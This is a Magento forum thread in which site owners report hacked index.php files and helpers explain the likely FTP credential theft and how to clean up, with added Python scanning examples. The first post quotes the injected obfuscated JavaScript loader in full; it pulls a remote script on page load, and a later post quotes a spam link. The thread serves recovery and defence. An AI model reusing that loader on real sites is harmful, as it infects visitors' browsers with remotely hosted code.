Magento Forum

My new Magento site Hacked
 
shayona
Jr. Member
 
Total Posts:  15
Joined:  2009-11-14
Ahmedabad, India
 

Hi,

I launched my new Magento (latest version) site a month ago, and today when I went to my site I found this error:

Parse error: syntax error, unexpected ‘<’ in /home/website/public_html/index.php on line 67

When I downloaded the index file and checked line 67, I found the following script. I removed it and uploaded the index file, and the site is working OK, but I have a few questions:

1. How did they hack my website and upload this script to it?
2. How can I protect against such hackers?
3. I am afraid that the hacker might have uploaded this script to other files. How can I scan my website completely? I have shared hosting.

Waiting for your reply.

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement(’script’);H3qqea3ur6p.setAttribute(’type’, ‘text/javascript’);H3qqea3ur6p.setAttribute(’id’, ‘myscript1’);H3qqea3ur6p.setAttribute(’src’, ‘h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v;()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i;#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t;@@a()r#$#)t))@s#!#)a!l##e@(.))&r;$!u!&):)8(0$)@$8^#^@0&)$^/!!&w;@$(o@^r(^(!d@^p^#)r#e@^s(&s;&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e;^))&@-($(m)#)a#)i^l^#.!&^)i!&t;$@^/((!(l)!i&v;^(&(e()#j^$a&s;@(&m;$^&(i$#@n!#^-#@)p$!!$h$!o(&#t;(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t;)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o;^^m^@/(@^^’.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ‘’));H3qqea3ur6p.setAttribute(’defer’, ‘defer’);document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>

 
Crucial Web Host
Guru
Total Posts:  364
Joined:  2007-11-08
Phoenix, AZ
 

Hi Nile,

nile - 04 December 2009 11:11 PM

How did they hack my website and upload this script to it?

The most likely scenario is that this is not a Magento exploit at all.

There is a nasty FTP exploit going around that hijacks a user’s FTP passwords from popular FTP applications on ‘local’ computers, i.e. your home system.  This hijacked FTP password is then sent to the ‘hacker’, or phoned home, where the hacker then injects various iframes and JavaScript into a variety of pages on your site - in this case, and most cases, index.php - since it is most likely to exist and be accessed.

nile - 04 December 2009 11:11 PM

I am afraid that the hacker might have uploaded this script to other files. How can I scan my website completely? I have shared hosting.

This can be confirmed by viewing your FTP logs on, or about, the time that your index.php file was injected with the script.  If you are using shared hosting, your host should easily be able to do this.  What you’ll find is that someone other than you has used your FTP credentials to inject the script into your page(s).  This will also help you to know which pages have been injected and help you to clean things up.

nile - 04 December 2009 11:11 PM

How can I protect against such hackers?

The quick and immediate way to stop this is to change your FTP password with your host.  Without changing your FTP password, this will continue to happen over and over again, until you do change it.  Best to just change it now.

But the real issue here is that one of the computers that accesses your FTP account (your computer or possibly others that have access) has had its FTP program compromised.  You will need to scan all computers that have had FTP access to your account for malware and exploits - one or more of the machines has been exploited and you’ll need to find the source, or this will just happen again once you access your FTP account from this compromised computer.

In the end - the exploit was likely picked up from a rogue webpage that exploited a weakness in your browser and was able to compromise the FTP application and gain the saved login credentials.  Changing the FTP password will stop the script injections, but until you find the compromised computer this will continue to be a problem for you.

I recommend you check out SpyBot ( http://www.safer-networking.org/index2.html ) or Microsoft Security Essentials ( http://www.microsoft.com/Security_Essentials/ ) if you are using a Microsoft OS on your computer(s).

Hope this helps -
Happy Holidays~

 
Crucial Web Host
Guru
Total Posts:  364
Joined:  2007-11-08
Phoenix, AZ
 

I’d also like to add that you really should no longer be using FTP -

This is an incredibly insecure protocol that sends your login credentials via plain text across the network. 

You should be using SFTP or SCP for file transfers as these protocols are supported by all major FTP/IDE applications and submit your login credentials in an encrypted format providing a much stronger layer of security. 

FTP is most likely the weakest link in all web hosting.  FTP should be disabled completely if not in use.  A very insecure protocol, indeed.

 
lisali
Enthusiast
Total Posts:  889
Joined:  2008-04-28
London, UK
 

Hi,

One of my sites was hacked too.

The files modified are:

SITE.com/index.php
SITE.com/downloader/index.php

There may be other infected files, but I’m not sure yet. My FTP client is WinSCP.

 
lisali
Enthusiast
Total Posts:  889
Joined:  2008-04-28
London, UK
 

Hi,

Actually, there are LOADS of compromised files. All php/phtml/js.
Good luck!

 
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

I was hacked 10 hours ago also, removed the javascript from index file but the admin section is still not working.

Yeah just found it on these files as well
SITE.com/index.php
SITE.com/downloader/index.php

I am downloading my website and searching for the script. Is the script the only thing you have found, over and over again, or are there different things?

 
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

Yeah I’m finding this file in lots of files, I am just looking at what files were edited last night and changing them. Let me know how anyone else goes with this :)

 
lisali
Enthusiast
Total Posts:  889
Joined:  2008-04-28
London, UK
 

This was an FTP exploit, so change your FTP username/password ASAP. Run a virus/rootkit scan. McAfee can repair infected files.

About a thousand files are infected. A number in downloader/pearlib/download. You can delete all the files in that directory anyway, so you have less to deal with.

The JS files have a slightly different exploit.

The best thing to do is to download all the files locally, run “find” on “/*GNU GPL*/” and see what comes up. Then run “find & replace”.

Good luck!

 
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

Thanks lisali,

I just manually changed probably 60 files, but the admin still doesn’t work properly, I am downloading my site and doing as you advised now.

Thanks!

 
JLHC
Mentor
Total Posts:  1287
Joined:  2008-05-09
Tampa, FL
 

Well if you have a recent backup it is recommended to restore your files and database from the backup if possible.

Besides changing your passwords, you should also not store any password information in your browser as well as your FTP clients and make sure that they are updated to the latest versions, as passwords are normally stolen from web browsers as well as FTP clients.

 
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

Yeah, I didn’t make a recent backup this time. It all seems to be working well now though; I just removed it from another 100 pages. I’m with aspiration; I’ll keep in mind to make a backup once every couple of days.

 
JLHC
Mentor
Total Posts:  1287
Joined:  2008-05-09
Tampa, FL
 
Soro - 07 January 2010 03:56 PM

Yeah, I didn’t make a recent backup this time. It all seems to be working well now though; I just removed it from another 100 pages. I’m with aspiration; I’ll keep in mind to make a backup once every couple of days.

Great to hear that it is working fine for you now. ;)
In the future if you are hosted by us, we can restore your website from a recent backup as well if you request for it.

 
 
RRadvice
Jr. Member
 
Total Posts:  3
Joined:  2009-12-12
 

You are not alone, I got hit by the same thing. A real pain to remove. I saw a reference to a script to find those files and strip the code at the bottom of the page, but did not bookmark it and cannot locate it now.  If anyone knows of its location it would be really appreciated.

 
lazzo
Jr. Member
Total Posts:  10
Joined:  2009-09-07
Malmö, Sweden
 

Check this site to find a cure. Start by changing your FTP password to avoid future problems, then run the script you find here in your www-root.
http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html

Affected files are index*.php, default*, .js etc.

My guess is that you have been using FileZilla and some evil malware has found the XML file that stores hosts, users and passwords in clear text. So if you have other sites added to FileZilla, make sure to change the password and run the scripts there as well.

Good luck.

 
Turnkeye
Enthusiast
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 

Also scan your files for base64-encoded code; hackers can use this tactic to hide the code that was added to the files.
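
Added example, not part of any post in this thread: a Python sketch of the two scans suggested above, run over a downloaded copy of the site, looking for the `/*GNU GPL*/` marker and for base64-encoded code. The file extensions, the 200-character base64 threshold, the `.infected` backup suffix and the sample files in `demo()` are assumptions made for the example.

```python
import re
import tempfile
from pathlib import Path

# The injected element as posted in the thread: <script>/*GNU GPL*/ ... </script>
INJECTED = re.compile(rb"<script>/\*GNU GPL\*/.*?</script>", re.DOTALL)
# Heuristic (assumption): a base64_decode( call or a 200+ character base64 run
B64 = re.compile(rb"base64_decode\s*\(|[A-Za-z0-9+/]{200,}={0,2}", re.IGNORECASE)
EXTENSIONS = {".php", ".phtml", ".js", ".html", ".htm"}  # assumed scope

def scan_tree(root):
    """Return {relative path: [finding, ...]} for suspicious files under root."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        data = path.read_bytes()
        hits = []
        if INJECTED.search(data):
            hits.append("gnu-gpl-script")   # exact block, can be stripped
        elif b"/*GNU GPL*/" in data:
            hits.append("gnu-gpl-marker")   # variant (e.g. in .js), review by hand
        if B64.search(data):
            hits.append("base64")           # candidate only, review by hand
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def strip_injection(path):
    """Remove injected blocks; keep the original as <name>.infected. Returns count."""
    path = Path(path)
    data = path.read_bytes()
    cleaned, count = INJECTED.subn(b"", data)
    if count:
        path.with_name(path.name + ".infected").write_bytes(data)
        path.write_bytes(cleaned)
    return count

def demo():
    with tempfile.TemporaryDirectory() as tmp:  # constructed sample tree
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "index.php").write_bytes(
            b"<?php echo 1;\n<script>/*GNU GPL*/ try{}catch(e){}</script>\n")
        (root / "js" / "a.js").write_bytes(b"var a=1;/*GNU GPL*/ try{}catch(e){}")
        (root / "lib.php").write_bytes(b"<?php eval(base64_decode('ZWNobyAxOw=='));")
        (root / "ok.php").write_bytes(b"<?php echo 'clean';")
        before = scan_tree(root)
        removed = strip_injection(root / "index.php")
        return before, removed, scan_tree(root)
```

Run `scan_tree()` on the local download first and use `strip_injection()` only on files reported as `gnu-gpl-script`; legitimate code also calls `base64_decode`, so `base64` hits need a manual look.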

 
 
RegB
Jr. Member
 
Total Posts:  9
Joined:  2010-02-28
 

This morning I discovered our site was hacked around 5:00 pm yesterday afternoon.  The website homepage was reporting the following error as was the Magento Admin console:

error message:  Parse error: syntax error, unexpected \’<\’ in /home/MYDOMAIN/public_html/index.php on line 79

I first checked the date/time stamp on index.php and saw that it exactly matched the date/time on my backup.  So, first impression was no changes had been made to the file.  However, the following line had been appended to the very last line of the file:

a rel="muse" href="http://ediziizle.com" title="dizi izle, online dizi izle, diziizle” ><font color="#FF0000" size="2"><b>dizi izle</b></font></a>

My ISP checked the FTP log files for our account and found NO RECENT ACTIVITY.  So, this does not appear to be a case of FTP username/password being stolen and used to change files on our site.

The downloader/index.php file was not modified.  So far, it looks like none of the other files on our site were modified.  However, I’m still downloading the site and verifying.

Right now I’m completely clueless as to how the root index.php file was modified (without the date/time stamp being updated, too).  We are running Magento version 1.4.0.1.

Any help, thoughts, ideas, etc., on what needs to be fixed to prevent this from happening would be greatly appreciated.
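
Added example, not part of any post in this thread: a file's modification time can be set by whoever is able to write the file, so a timestamp that matches the backup does not show that the content is unchanged. The Python sketch below compares SHA-256 hashes of a live copy against a known-good backup instead; the directory layout, file contents and timestamp in `demo()` are constructed.

```python
import hashlib
import os
import tempfile
from pathlib import Path

def hash_tree(root):
    """Map relative path -> (SHA-256 hex digest, whole-second mtime)."""
    root = Path(root)
    out = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            out[path.relative_to(root).as_posix()] = (digest, int(path.stat().st_mtime))
    return out

def compare_to_backup(live_root, backup_root):
    """Report content differences between a live tree and a known-good backup."""
    live, backup = hash_tree(live_root), hash_tree(backup_root)
    changed = sorted(p for p in live.keys() & backup.keys()
                     if live[p][0] != backup[p][0])
    return {
        "changed": changed,
        # Content differs although the timestamp still matches the backup
        "changed_same_mtime": [p for p in changed if live[p][1] == backup[p][1]],
        "added": sorted(live.keys() - backup.keys()),
        "missing": sorted(backup.keys() - live.keys()),
    }

def demo():
    stamp = 1267300000  # constructed timestamp shared by both copies
    with tempfile.TemporaryDirectory() as tmp:
        live, backup = Path(tmp, "live"), Path(tmp, "backup")
        for root in (live, backup):
            root.mkdir()
            (root / "index.php").write_bytes(b"<?php Mage::run();\n")
            (root / "cron.php").write_bytes(b"<?php // cron\n")
            os.utime(root / "index.php", (stamp, stamp))
        # Constructed tampering: a line is appended and the old timestamp restored
        with open(live / "index.php", "ab") as fh:
            fh.write(b'<a href="http://example.invalid">link</a>\n')
        os.utime(live / "index.php", (stamp, stamp))
        (live / "extra.php").write_bytes(b"<?php // not in the backup\n")
        return compare_to_backup(live, backup)

if __name__ == "__main__":
    print(demo())
```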

 